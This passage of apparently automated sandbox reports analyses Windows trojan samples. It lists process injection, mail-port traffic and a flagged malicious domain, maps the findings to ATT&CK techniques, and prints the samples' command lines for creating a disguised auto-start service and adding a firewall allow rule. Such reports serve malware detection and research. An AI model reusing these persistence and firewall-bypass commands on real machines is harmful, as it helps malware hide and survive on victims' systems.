Spawned process \"svchost.exe\" (UID: 00000000-00005656)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" allocated memory in \"C:\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 468)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 468)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 468)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 584)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 584)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 584)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"npkqjwg.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"npkqjwg.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"npkqjwg.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"npkqjwg.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"npkqjwg.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"npkqjwg.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00001776)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start jfnxeyae\" (UID: 00000000-00001952)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005100)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41
https://hybrid-analysis.com/sample/2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41
Hybrid Analysis - Um_unhooking
{"size": 13995750, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41", "sha256": "2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 10, "total_processes": 9, "total_signatures": 240, "extracted_files": [{"name": "jaigqlsg.exe", "file_path": "%TEMP%\\jaigqlsg.exe", "file_size": 5242368, "sha256": "c8b9b3a2545b66141ac9ae76c676d67a059beb0af2e511b6da1ea8b0f7d0ce42", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 6044)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "jaigqlsg.exe.67EE4A7D.bin", "file_size": 12971520, "sha256": "5091d808234a01cf75902087f72dd23afb3426a7d868318a07af42c95ecbd80b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005976", "name": "2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe", "normalized_path": "C:\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe", "sha256": "2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41"}, {"uid": "00000000-00005968", "parentuid": "00000000-00005976", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\pltdkegk\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006044", "parentuid": "00000000-00005976", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\jaigqlsg.exe\" %WINDIR%\\system32\\pltdkegk\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00006096", "parentuid": "00000000-00005976", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create pltdkegk binPath= \"%WINDIR%\\system32\\pltdkegk\\jaigqlsg.exe /d\\\"C:\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00003764", "parentuid": "00000000-00005976", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description pltdkegk \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00006032", "parentuid": "00000000-00005976", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start pltdkegk", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004188", "parentuid": "00000000-00005976", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00004216", "name": "jaigqlsg.exe", "normalized_path": "%WINDIR%\\system32\\pltdkegk\\jaigqlsg.exe", "command_line": "/d\"C:\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\"", "sha256": "5091d808234a01cf75902087f72dd23afb3426a7d868318a07af42c95ecbd80b"}, {"uid": "00000000-00003600", "parentuid": "00000000-00004216", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 7, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, 